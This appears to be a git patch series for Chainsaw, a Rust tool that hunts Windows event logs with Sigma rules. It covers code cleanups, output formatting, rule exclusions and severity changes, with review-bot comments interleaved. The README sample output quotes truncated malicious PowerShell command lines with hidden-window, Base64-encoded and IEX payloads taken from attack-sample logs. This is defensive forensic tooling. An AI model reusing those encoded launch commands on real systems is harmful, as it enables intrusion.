@@ -234,7 +234,7 @@ pub fn load( } let sigma = match sigma::load(path)? .into_iter() - .map(|y| serde_yaml::from_value::(y)) + .map(serde_yaml::from_value::) .collect::, _>>() { Ok(rules) => rules, @@ -261,13 +261,13 @@ pub fn load( if let Some(levels) = levels.as_ref() { rules = rules .into_iter() - .filter(|r| levels.contains(&r.level())) + .filter(|r| levels.contains(r.level())) .collect(); } if let Some(statuses) = statuses.as_ref() { rules = rules .into_iter() - .filter(|r| statuses.contains(&r.status())) + .filter(|r| statuses.contains(r.status())) .collect(); } Ok(rules) @@ -292,7 +292,7 @@ pub fn lint(kind: &Kind, path: &Path) -> crate::Result> { Ok(yamls) => { let sigma = yamls .into_iter() - .map(|y| serde_yaml::from_value::(y)) + .map(serde_yaml::from_value::) .collect::, _>>()?; sigma .into_iter() diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 21fa84fe..a7ef4ff1 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -289,7 +289,7 @@ fn prepare_condition(condition: &str) -> Result<(String, Option)> { // agg-function(agg-field) [ by group-field ] comparison-op value if let Some(kind) = parts.next() { if let Some(rest) = kind.strip_prefix("count(") { - if let Some(field) = rest.strip_suffix(")") { + if let Some(field) = rest.strip_suffix(')') { if !field.is_empty() { fields.push(field.to_owned()); } @@ -413,7 +413,7 @@ fn prepare( } } detection = Detection { - condition: Some(Yaml::String(condition.to_owned())), + condition: Some(Yaml::String(condition)), identifiers, } } @@ -451,8 +451,7 @@ fn detections_to_tau(detection: Detection) -> Result { match v { Yaml::Sequence(sequence) => { let mut blocks = vec![]; - let mut index = 0; - for entry in sequence { + for (index, entry) in sequence.into_iter().enumerate() { let mapping = match entry.as_mapping() { Some(mapping) => mapping, None => bail!("keyless identifiers cannot be converted"), 
@@ -475,7 +474,7 @@ fn detections_to_tau(detection: Detection) -> Result { if modifiers.contains("all") { f = format!("all({})", f); } - let v = parse_identifier(&v, &modifiers)?; + let v = parse_identifier(v, &modifiers)?; let f = f.into(); let mut map = Mapping::new(); map.insert(f, v); @@ -497,7 +496,6 @@ fn detections_to_tau(detection: Detection) -> Result { Yaml::Sequence(maps.into_iter().map(|m| m.into()).collect()), )); } - index += 1; } patches.insert( k, @@ -512,7 +510,7 @@ fn detections_to_tau(detection: Detection) -> Result { ), ); for (k, v) in blocks { - det.insert(k.into(), v.into()); + det.insert(k.into(), v); } } Yaml::Mapping(mapping) => { @@ -569,7 +567,7 @@ fn detections_to_tau(detection: Detection) -> Result { .replace(" OR ", " or ") .split_whitespace() .map(|ident| { - let key = ident.trim_start_matches("(").trim_end_matches(")"); + let key = ident.trim_start_matches('(').trim_end_matches(')'); match patches.get(key) { Some(v) => ident.replace(key, v), None => ident.to_owned(), @@ -603,7 +601,7 @@ fn detections_to_tau(detection: Detection) -> Result { let mut parts = condition.split_whitespace(); while let Some(part) = parts.next() { let mut token = part; - while let Some(tail) = token.strip_prefix("(") { + while let Some(tail) = token.strip_prefix('(') { mutated.push("(".to_owned()); token = tail; } @@ -619,11 +617,11 @@ fn detections_to_tau(detection: Detection) -> Result { if let Some(next) = parts.next() { let mut brackets = vec![]; let mut identifier = next; - while let Some(head) = identifier.strip_suffix(")") { + while let Some(head) = identifier.strip_suffix(')') { brackets.push(")".to_owned()); identifier = head; } - if let Some(ident) = identifier.strip_suffix("*") { + if let Some(ident) = identifier.strip_suffix('*') { let mut keys = vec![]; for (k, _) in &det { if let Yaml::String(key) = k { 
@@ -651,7 +649,7 @@ fn detections_to_tau(detection: Detection) -> Result { Some(i) => i, None => identifier, }; - let key = next.replace(identifier, &key); + let key = next.replace(identifier, key); if part == "all" { mutated.push(format!("all({})", key)); } else if part == "1" { From 8a32938c3bc0843fe6043088848649e9b4c9967c Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 7 Jul 2022 13:56:31 +0100 Subject: [PATCH 66/77] feat: allow tabular output to output complex data --- mappings/sigma-event-logs-all.yml | 3 +++ src/cli.rs | 41 ++++++++++++++++++++++++++++--- 2 files changed, 41 insertions(+), 3 deletions(-) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index cb072be3..cedbe0fd 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -20,6 +20,9 @@ groups: - name: Computer from: Computer to: Event.System.Computer + - name: Event Data + from: EventData + to: Event.EventData - from: AccessList to: Event.EventData.AccessList diff --git a/src/cli.rs b/src/cli.rs index d6f4f5f1..8e37fff9 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -6,8 +6,9 @@ use chrono_tz::Tz; use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; use prettytable::{cell, format, Row, Table}; use serde::Serialize; +use serde_json::{Map, Number, Value as Json}; use std::hash::{Hash, Hasher}; -use tau_engine::Document; +use tau_engine::{Document, Value as Tau}; use uuid::Uuid; use crate::file::Kind as FileKind; @@ -387,8 +388,15 @@ pub fn print_detections( ))); } None => { - "".hash(&mut hasher); - cells.push(cell!("")); + let yaml = serde_yaml::to_string(&to_json_truncated( + value, + column_width, + )) + .expect("could not get yaml"); + yaml.hash(&mut hasher); + cells.push(cell!(yaml)); + //"".hash(&mut hasher); + //cells.push(cell!("")); } } continue; 
@@ -758,3 +766,30 @@ pub fn print_json( cs_print_json!(&detections)?; Ok(()) } + +pub fn to_json_truncated(tau: Tau, width: u32) -> Json { + match tau { + Tau::Null => Json::Null, + Tau::Bool(b) => Json::Bool(b), + Tau::Float(f) => Json::Number(Number::from_f64(f).expect("could not set f64")), + Tau::Int(i) => Json::Number(Number::from(i)), + Tau::UInt(u) => Json::Number(Number::from(u)), + Tau::String(s) => { + let mut x = s.to_string(); + x.truncate(width as usize); + if x.len() != s.len() { + x = format!("{}...", x); + } + Json::String(x) + } + Tau::Array(a) => Json::Array(a.iter().map(|x| to_json_truncated(x, width)).collect()), + Tau::Object(o) => { + let mut map = Map::new(); + for k in o.keys() { + let v = o.get(&k).expect("could not get value"); + map.insert(k.to_string(), to_json_truncated(v, width)); + } + Json::Object(map) + } + } +} From 8fa32c429725d93b8b36c73098f8ca379a4ccdd4 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 14:30:37 +0100 Subject: [PATCH 67/77] fix: rename ignore to exclusions in mapping --- mappings/sigma-event-logs-all.yml | 10 +++++++++- mappings/sigma-event-logs.yml | 2 +- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index cedbe0fd..2e33e84d 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -3,6 +3,14 @@ name: Chainsaw's groupless Sigma mappings for Event Logs kind: evtx rules: sigma +exclusions: +- Defense evasion via process reimaging +- Exports Registry Key To an Alternate Data Stream +- NetNTLM Downgrade Attack +- Non Interactive PowerShell +- Wuauclt Network Connection +- Raw Disk Access From Illegitimate Tools + groups: - name: Sigma timestamp: Event.System.TimeCreated @@ -21,7 +29,7 @@ groups: from: Computer to: Event.System.Computer - name: Event Data - from: EventData + from: EventData to: Event.EventData - from: AccessList 
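Review bot: `x.truncate(width as usize)` in the new `Tau::String` arm cuts at a byte index, and `String::truncate` panics when that index is not a char boundary; event data routinely contains multi-byte text (non-Latin command lines, user names, paths), so a single such record would abort the whole hunt. Truncate by characters instead — replace the `to_string`/`truncate` pair with `let mut x: String = s.chars().take(width as usize).collect();` — and the `x.len() != s.len()` check below still works because `x` is a prefix of `s`. The `Number::from_f64(f).expect("could not set f64")` arm likewise turns a non-finite float, should a document ever surface one, into a panic rather than a `Json::Null`.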
diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index 2cf419bd..bbb410d3 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -3,7 +3,7 @@ name: Chainsaw's Sigma mappings for Event Logs kind: evtx rules: sigma -ignore: +exclusions: - Defense evasion via process reimaging - Exports Registry Key To an Alternate Data Stream - NetNTLM Downgrade Attack From 5d3e998eebee437879c4c71280f9a7c02fa8d657 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 19:17:50 +0100 Subject: [PATCH 68/77] chore: format field outputs for global mapping files --- mappings/sigma-event-logs-all.yml | 4 ++- src/cli.rs | 52 +++++++++++++++---------------- 2 files changed, 28 insertions(+), 28 deletions(-) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index 2e33e84d..82619530 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -9,7 +9,9 @@ exclusions: - NetNTLM Downgrade Attack - Non Interactive PowerShell - Wuauclt Network Connection -- Raw Disk Access From Illegitimate Tools +- Raw Disk Access Using Illegitimate Tools +- Executable in ADS +- Space After Filename - macOS groups: - name: Sigma diff --git a/src/cli.rs b/src/cli.rs index 8e37fff9..a86a836b 100644 --- a/src/cli.rs +++ b/src/cli.rs 
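Review bot: The exclusion lists match rules by exact title (hunt.rs checks `exclusions.contains(rule.name())`), and this hunk already has to correct one entry from "From" to "Using" to keep it effective; an upstream retitle silently re-enables a rule that was excluded for noise, and chainsaw reports nothing. Until exclusion by Sigma `id` is supported, a comment above the list, `# Exclusions match the Sigma rule title exactly; re-check this list whenever the rule set is updated`, makes the fragility visible to whoever refreshes the rules. The same list is now maintained in both `sigma-event-logs.yml` and `sigma-event-logs-all.yml`, which is where the two copies will drift.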
@@ -48,29 +48,29 @@ pub fn init_progress_bar(size: u64, msg: String) -> indicatif::ProgressBar { pb } -pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String { +pub fn format_field_length(data: &str, full_output: bool, col_width: u32) -> String { // Take the context_field and format it for printing. Remove newlines, break into even chunks etc. // If this is a scheduled task we need to parse the XML to make it more readable - let mut data = data + let mut scratch = data .replace('\n', "") .replace('\r', "") .replace('\t', "") .replace(" ", " ") .chars() .collect::>() - .chunks(length as usize) + .chunks(col_width as usize) .map(|c| c.iter().collect::()) .collect::>() .join("\n"); - let truncate_len = 1000; + let truncate_len = 500; - if !full_output && data.len() > truncate_len { - data.truncate(truncate_len); - data.push_str("...\n\n(use --full to show all content)"); + if !full_output && scratch.len() > truncate_len { + scratch.truncate(truncate_len); + scratch.push_str("...\n(use --full to show all content)"); } - data + scratch } fn split_tag(tag_name: &str) -> String { @@ -384,19 +384,24 @@ pub fn print_detections( cells.push(cell!(format_field_length( &v, full, - column_width + column_width, ))); } None => { - let yaml = serde_yaml::to_string(&to_json_truncated( - value, - column_width, - )) - .expect("could not get yaml"); + let mut yaml = + serde_yaml::to_string(&tau_to_json(value)) + .expect("could not get yaml"); + + yaml = yaml + .split('\n') + .collect::>() + .iter() + .map(|x| format_field_length(x, full, column_width)) + .collect::>() + .join("\n") + .replace("\\n", "\n"); yaml.hash(&mut hasher); cells.push(cell!(yaml)); - //"".hash(&mut hasher); - //cells.push(cell!("")); } } continue; 
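Review bot: `scratch.truncate(truncate_len)` slices the `String` at byte 500, and `String::truncate` panics if that byte is not a char boundary; `scratch` is built from the event's own text (the `chars().chunks()` step keeps multi-byte characters whole, so byte length is not character count), and a non-ASCII command line or path straddling offset 500 aborts the run on a single record. Truncate by characters: `if !full_output && scratch.chars().count() > truncate_len {` / `scratch = scratch.chars().take(truncate_len).collect();` / `scratch.push_str("...\n(use --full to show all content)");`. The drop from 1000 to 500 also deserves a one-line comment stating why, since it changes what analysts see by default.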
@@ -767,27 +772,20 @@ pub fn print_json( Ok(()) } -pub fn to_json_truncated(tau: Tau, width: u32) -> Json { +pub fn tau_to_json(tau: Tau) -> Json { match tau { Tau::Null => Json::Null, Tau::Bool(b) => Json::Bool(b), Tau::Float(f) => Json::Number(Number::from_f64(f).expect("could not set f64")), Tau::Int(i) => Json::Number(Number::from(i)), Tau::UInt(u) => Json::Number(Number::from(u)), - Tau::String(s) => { - let mut x = s.to_string(); - x.truncate(width as usize); - if x.len() != s.len() { - x = format!("{}...", x); - } - Json::String(x) - } - Tau::Array(a) => Json::Array(a.iter().map(|x| to_json_truncated(x, width)).collect()), + Tau::String(s) => Json::String(s.to_string()), + Tau::Array(a) => Json::Array(a.iter().map(tau_to_json).collect()), Tau::Object(o) => { let mut map = Map::new(); for k in o.keys() { let v = o.get(&k).expect("could not get value"); - map.insert(k.to_string(), to_json_truncated(v, width)); + map.insert(k.to_string(), tau_to_json(v)); } Json::Object(map) } From b53795667a0ee329bd09febc8a6668a674c0405c Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 22:28:25 +0100 Subject: [PATCH 69/77] feat: auto adjust column width based on terminal size --- Cargo.lock | 11 +++++++++++ Cargo.toml | 1 + src/main.rs | 22 +++++++++++++++++++++- 3 files changed, 33 insertions(+), 1 deletion(-) diff --git a/Cargo.lock b/Cargo.lock index a5754deb..cce62266 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -183,6 +183,7 @@ dependencies = [ "serde_yaml", "structopt", "tau-engine", + "term_size", "uuid", ] @@ -1231,6 +1232,16 @@ dependencies = [ "winapi", ] +[[package]] +name = "term_size" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e4129646ca0ed8f45d09b929036bafad5377103edd06e50bf574b353d2b08d9" +dependencies = [ + "libc", + "winapi", +] + [[package]] name = "termcolor" version = "1.1.3" diff --git a/Cargo.toml b/Cargo.toml index ee1e2088..e9d3c540 100644 --- a/Cargo.toml +++ b/Cargo.toml 
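Review bot: `Number::from_f64(f).expect("could not set f64")` in the `Tau::Float` arm panics for NaN and ±infinity, which serde_json cannot represent, so a document that surfaces a non-finite float — input the tool does not control — would abort output for the whole run. Degrade instead of panicking: `Tau::Float(f) => Number::from_f64(f).map(Json::Number).unwrap_or(Json::Null),`, or render it as a string if the value should stay visible. A short doc comment saying that `tau_to_json` is a display-only conversion that no longer truncates (the old name advertised truncation, which `format_field_length` now does) would also help the next reader.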
@@ -28,6 +28,7 @@ serde_json = "1.0" serde_yaml = "0.8" structopt = "0.3" tau-engine = { version = "1.0", features = ["core", "json"] } +term_size = "0.3" uuid = { version = "1.1", features = ["serde", "v4"] } diff --git a/src/main.rs b/src/main.rs index 6c093b44..07d7d81f 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,5 +1,6 @@ #[macro_use] extern crate chainsaw; +extern crate term_size; use std::collections::HashSet; use std::fs::File; @@ -201,6 +202,22 @@ fn print_title() { ); } +fn resolve_col_width() -> Option { + // Get windows size and return a rough mapping for sutiable col width + match term_size::dimensions() { + Some((w, _h)) => match w { + 50..=120 => Some(30), + 121..=239 => Some(40), + 240..=340 => Some(70), + 341..=430 => Some(110), + 431..=550 => Some(150), + 551.. => Some(180), + _ => None, + }, + None => None, + } +} + fn init_writer(output: Option, csv: bool, json: bool, quiet: bool) -> crate::Result<()> { let (path, output) = match &output { Some(path) => { @@ -250,7 +267,7 @@ fn run() -> Result<()> { rule, load_unknown, - column_width, + mut column_width, csv, extension, from, @@ -269,6 +286,9 @@ fn run() -> Result<()> { timezone, to, } => { + if column_width.is_none() { + column_width = resolve_col_width(); + } init_writer(output, csv, json, quiet)?; if !opts.no_banner { print_title(); From 0c76b48ec1def895c471a6410a7da44cde1b5b7b Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 22:30:01 +0100 Subject: [PATCH 70/77] chore: exclude noisy rules via mapping file --- mappings/sigma-event-logs-all.yml | 4 ++++ mappings/sigma-event-logs.yml | 8 ++++++++ 2 files changed, 12 insertions(+) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index 82619530..d4dec164 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml 
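Review bot: The width table in `resolve_col_width` (`50..=120 => Some(30)`, …) is a tuning heuristic with no comment on how the buckets were chosen, and the next commit in this series already retunes every value, which is the sign it needs documenting; suggested doc comment: `/// Pick a default detection-table column width from the terminal width. Buckets are empirical; None for terminals narrower than 50 columns, leaving the caller's default in place.`, plus the typo `sutiable` → `suitable` in the inline comment. If the crate is on edition 2018 or later, the added `extern crate term_size;` is unnecessary. Adding `term_size` (per the lockfile, pulling `libc` and `winapi`) only to read the terminal width is new supply-chain surface for a tool run on investigator workstations; confirm the crate is still maintained before shipping, or check whether a crate already in the tree exposes the same information.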
@@ -12,6 +12,10 @@ exclusions: - Raw Disk Access Using Illegitimate Tools - Executable in ADS - Space After Filename - macOS +- Execution Of Non-Existing File +- Execution of Suspicious File Type Extension +- Execution from Suspicious Folder +- Process Start From Suspicious Folder groups: - name: Sigma diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index bbb410d3..9030a02c 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -9,6 +9,14 @@ exclusions: - NetNTLM Downgrade Attack - Non Interactive PowerShell - Wuauclt Network Connection + - Raw Disk Access Using Illegitimate Tools + - Executable in ADS + - Space After Filename - macOS + - Execution Of Non-Existing File + - Execution of Suspicious File Type Extension + - Execution from Suspicious Folder + - Process Start From Suspicious Folder + groups: - name: Suspicious Process Creation From 67b4e582d3090774a8a1e19e03cf327376580efd Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 23:55:58 +0100 Subject: [PATCH 71/77] feat: adding event data to csv output --- src/cli.rs | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index a86a836b..57e0140b 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -628,8 +628,10 @@ pub fn print_csv( cells.push(v); } None => { - "".hash(&mut hasher); - cells.push("".to_owned()); + let yaml = serde_yaml::to_string(&tau_to_json(value)) + .expect("could not get yaml"); + yaml.hash(&mut hasher); + cells.push(yaml); } } continue; From b8f551171553f69987c5339d9afba90ffd9dd90e Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Fri, 8 Jul 2022 00:13:36 +0100 Subject: [PATCH 72/77] chore: adjust default column width --- src/main.rs | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/src/main.rs b/src/main.rs index 07d7d81f..37dad063 100644 --- a/src/main.rs +++ b/src/main.rs 
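Review bot: The new `None` branch of `print_csv` writes the YAML rendering of raw event data into a CSV cell, so cell contents are now attacker-influenced text (command lines, script blocks) and, if the file is opened in a spreadsheet, a value beginning with `=`, `+`, `-` or `@` can be evaluated as a formula (CSV injection); with `serde_yaml = "0.8"` the string also normally begins with a `---` document marker, which is unlikely to be what an analyst wants in a column. Unless the CSV writer downstream already quotes and escapes cells — not visible from this hunk — strip the marker and neutralise formula prefixes before pushing: `let yaml = yaml.trim_start_matches("---\n").to_owned();` then `let yaml = if yaml.starts_with(['=', '+', '-', '@']) { format!("'{}", yaml) } else { yaml };`. The same neutralisation applies to the `Some(v)` branch above, which already writes event fields verbatim.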
@@ -206,12 +206,12 @@ fn resolve_col_width() -> Option {
 // Get windows size and return a rough mapping for sutiable col width
 match term_size::dimensions() {
 Some((w, _h)) => match w {
- 50..=120 => Some(30),
- 121..=239 => Some(40),
- 240..=340 => Some(70),
- 341..=430 => Some(110),
- 431..=550 => Some(150),
- 551.. => Some(180),
+ 50..=120 => Some(20),
+ 121..=239 => Some(30),
+ 240..=340 => Some(50),
+ 341..=430 => Some(90),
+ 431..=550 => Some(130),
+ 551.. => Some(160),
 _ => None,
 },
 None => None,
From 2737eef4593658ebcebc385b2dded7317588b477 Mon Sep 17 00:00:00 2001
From: FranticTyping
Date: Mon, 11 Jul 2022 22:05:29 +0100
Subject: [PATCH 73/77] chore: update severity levels for chainsaw rules
---
 rules/antivirus/f-secure.yml | 2 +-
 rules/antivirus/kaspersky.yml | 2 +-
 rules/antivirus/sophos.yml | 2 +-
 rules/antivirus/windows_defender.yml | 2 +-
 rules/log_tampering/security_audit_log_was_cleared.yml | 2 +-
 rules/log_tampering/system_log_was_cleared.yml | 2 +-
 rules/service_tampering/event_log.yml | 2 +-
 7 files changed, 7 insertions(+), 7 deletions(-)
diff --git a/rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml
index 20fde701..42ac3bc8 100644
--- a/rules/antivirus/f-secure.yml
+++ b/rules/antivirus/f-secure.yml
@@ -7,7 +7,7 @@ authors:
 kind: evtx
-level: info
+level: critical
 status: stable
 timestamp: Event.System.TimeCreated
diff --git a/rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml
index e466e989..aa07f298 100644
--- a/rules/antivirus/kaspersky.yml
+++ b/rules/antivirus/kaspersky.yml
@@ -7,7 +7,7 @@ authors:
 kind: evtx
-level: info
+level: critical
 status: stable
 timestamp: Event.System.TimeCreated
diff --git a/rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml
index db54ef2a..868208bb 100644
--- a/rules/antivirus/sophos.yml
+++ b/rules/antivirus/sophos.yml
@@ -7,7 +7,7 @@ authors:
 kind: evtx
-level: info
+level: critical
 status: stable
 timestamp: Event.System.TimeCreated
diff --git a/rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml
index b5931982..087361f6 100644
--- a/rules/antivirus/windows_defender.yml
+++ b/rules/antivirus/windows_defender.yml
@@ -7,7 +7,7 @@ authors:
 kind: evtx
-level: info
+level: critical
 status: stable
 timestamp: Event.System.TimeCreated
diff --git a/rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml
index bd010f2f..f36ff851 100644
--- a/rules/log_tampering/security_audit_log_was_cleared.yml
+++ b/rules/log_tampering/security_audit_log_was_cleared.yml
@@ -7,7 +7,7 @@ authors:
 kind: evtx
-level: info
+level: critical
 status: stable
 timestamp: Event.System.TimeCreated
diff --git a/rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml
index a3a6ad6c..3716597a 100644
--- a/rules/log_tampering/system_log_was_cleared.yml
+++ b/rules/log_tampering/system_log_was_cleared.yml
@@ -7,7 +7,7 @@ authors:
 kind: evtx
-level: info
+level: high
 status: stable
 timestamp: Event.System.TimeCreated
diff --git a/rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml
index 54c9414c..4a0d0f90 100644
--- a/rules/service_tampering/event_log.yml
+++ b/rules/service_tampering/event_log.yml
@@ -7,7 +7,7 @@ authors:
 kind: evtx
-level: info
+level: critical
 status: stable
 timestamp: Event.System.TimeCreated
From 97f7f1c79a66042cf194850d786331137d365495 Mon Sep 17 00:00:00 2001
From: FranticTyping
Date: Mon, 11 Jul 2022 22:26:02 +0100
Subject: [PATCH 74/77] chore: rename mapping file
---
 mappings/{sigma-event-logs.yml => sigma-event-logs-legacy.yml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename mappings/{sigma-event-logs.yml => sigma-event-logs-legacy.yml} (100%)
diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs-legacy.yml
similarity index 100%
rename from mappings/sigma-event-logs.yml
rename to mappings/sigma-event-logs-legacy.yml
From 089c5036f5eecc7494d7134d038d58d0dedbeaab Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 11 Jul 2022 22:34:49 +0100 Subject: [PATCH 75/77] docs: update readme for beta release --- README.md | 184 +++++++++++++++++++++++++++++++++++------------------- 1 file changed, 121 insertions(+), 63 deletions(-) diff --git a/README.md b/README.md index eadefddc..4b1ebe86 100644 --- a/README.md +++ b/README.md @@ -20,7 +20,7 @@ Chainsaw provides a powerful ‘first-response’ capability to quickly identify - :bookmark_tabs: Output results in a variety of formats, such as ASCII table format, CSV format, and JSON format - :computer: Can be run on MacOS, Linux and Windows --- - $ ./chainsaw hunt evtx_attack_samples -s sigma_rules --mapping mappings/sigma-event-logs.yml --level critical + $ ./chainsaw hunt rules/ evtx_attack_samples -s sigma/rules --mapping mappings/sigma-event-logs-all.yml --level critical ██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗ ██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ 
@@ -30,66 +30,104 @@ Chainsaw provides a powerful ‘first-response’ capability to quickly identify ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ By F-Secure Countercept (@FranticTyping, @AlexKornitzer) - [+] Loading detection rules from: sigma_rules - [+] Loaded 169 detection rules (338 not loaded) - [+] Loading event logs from: evtx_attack_samples (extensions: .evtx) + [+] Loading detection rules from: ../../rules/, /tmp/sigma/rules + [+] Loaded 129 detection rules (198 not loaded) + [+] Loading event logs from: ../../evtx_attack_samples (extensions: .evtx) [+] Loaded 268 EVTX files (37.5 MB) [+] Hunting: [========================================] 268/268 - [+] Group: Suspicious File Creation - ┌─────────────────────┬───────────────────────────────┬───────┬──────────────────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐ - │ timestamp │ detections │ count │ Computer │ Image │ Target File Name │ - ├─────────────────────┼───────────────────────────────┼───────┼──────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2019-06-21 07:35:37 │ ‣ Dumpert Process Dumper │ 1 │ alice.insecurebank.local │ C:\Users\administrator\Desktop\x64\Outfl │ C:\Windows\Temp\dumpert.dmp │ - │ │ │ │ │ ank-Dumpert.exe │ │ - ├─────────────────────┼───────────────────────────────┼───────┼──────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2020-08-12 13:04:27 │ ‣ CVE-2021-1675 Print Spooler │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\spoolsv.exe │ C:\Windows\System32\spool\drivers\x64\3\ │ - │ │ Exploitation Filename │ │ │ │ New\STDSCHMX.GDL │ - │ │ Pattern │ │ │ │ │ - └─────────────────────┴───────────────────────────────┴───────┴──────────────────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘ - - [+] Group: Suspicious Process Creation - 
┌─────────────────────┬───────────────────────────────┬───────┬─────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐ - │ timestamp │ detections │ count │ Computer │ Image │ Command Line │ Parent Command Line │ - ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2019-04-30 20:26:52 │ ‣ Encoded FromBase64String │ 1 │ IEWIN7 │ C:\Windows\System32\WindowsPowerShell\v1 │ powershell.exe -nop -w hidden -noni -c " │ C:\Windows\system32\cmd.exe /b /c start │ - │ │ │ │ │ .0\powershell.exe │ if([IntPtr]::Size -eq 4){$b='powershell. │ /b /min powershell.exe -nop -w hidden -n │ - │ │ │ │ │ │ exe'}else{$b=$env:windir+'\syswow64\Wind │ oni -c "if([IntPtr]::Size -eq 4){$b='pow │ - │ │ │ │ │ │ owsPowerShell\v1.0\powershell.exe'};$s=N │ ershell.exe'}else{$b=$env:windir+'\syswo │ - │ │ │ │ │ │ ew-Object System.Diagnostics.ProcessStar │ w64\WindowsPowerShell\v1.0\powershell.ex │ - │ │ │ │ │ │ tInfo;$s.FileName=$b;$s.Arguments='-noni │ e'};$s=New-Object System.Diagnostics.Pro │ - │ │ │ │ │ │ -nop -w hidden -c &([scriptblock]::crea │ cessStartInfo;$s.FileName=$b;$s.Argument │ - │ │ │ │ │ │ IO.MemoryStream(,[Convert]::FromBase64St │ ew-Object IO.Compression.GzipStream((New │ - │ │ │ │ │ │ ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVE │ -Object IO.MemoryStream(,[Convert]::From │ - │ │ │ │ │ │ rZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/ │ Base64String(''H4sIAIuvyFwCA7VW+2/aSBD+O │ - │ │ │ │ │ │ u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2Dx │ ZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0la │ - │ │ │ │ │ │ Crl3Gbhx9ZapgqKf... │ yP6kiEwOpsexgQCk... 
│ - │ │ │ │ │ │ │ │ - │ │ │ │ │ │ (use --full to show all content) │ (use --full to show all content) │ - ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2019-08-14 12:17:14 │ ‣ Encoded FromBase64String │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\wscript.exe │ "c:\windows\system32\wscript.exe" /E:vbs │ "C:\Windows\system32\rundll32.exe" zipfl │ - │ │ ‣ Encoded IEX │ │ │ │ c:\windows\temp\icon.ico "powershell -e │ dr.dll,RouteTheCall shell:::{769f9427-3c │ - │ │ │ │ │ │ xec bypass -c ""IEX ([System.Text.Encodi │ c6-4b62-be14-2a705115b7ab} │ - │ │ │ │ │ │ ng]::ASCII.GetString([System.Convert]::F │ │ - │ │ │ │ │ │ romBase64String('JFhYPUlFWCgoJ1snICsgW2N │ │ - │ │ │ │ │ │ dOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNic │ │ - │ │ │ │ │ │ gKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDU │ │ - │ │ │ │ │ │ zICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZ │ │ - │ │ │ │ │ │ mICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyB │ │ - │ │ │ │ │ │ 7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1 │ │ - │ │ │ │ │ │ bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHY │ │ - │ │ │ │ │ │ 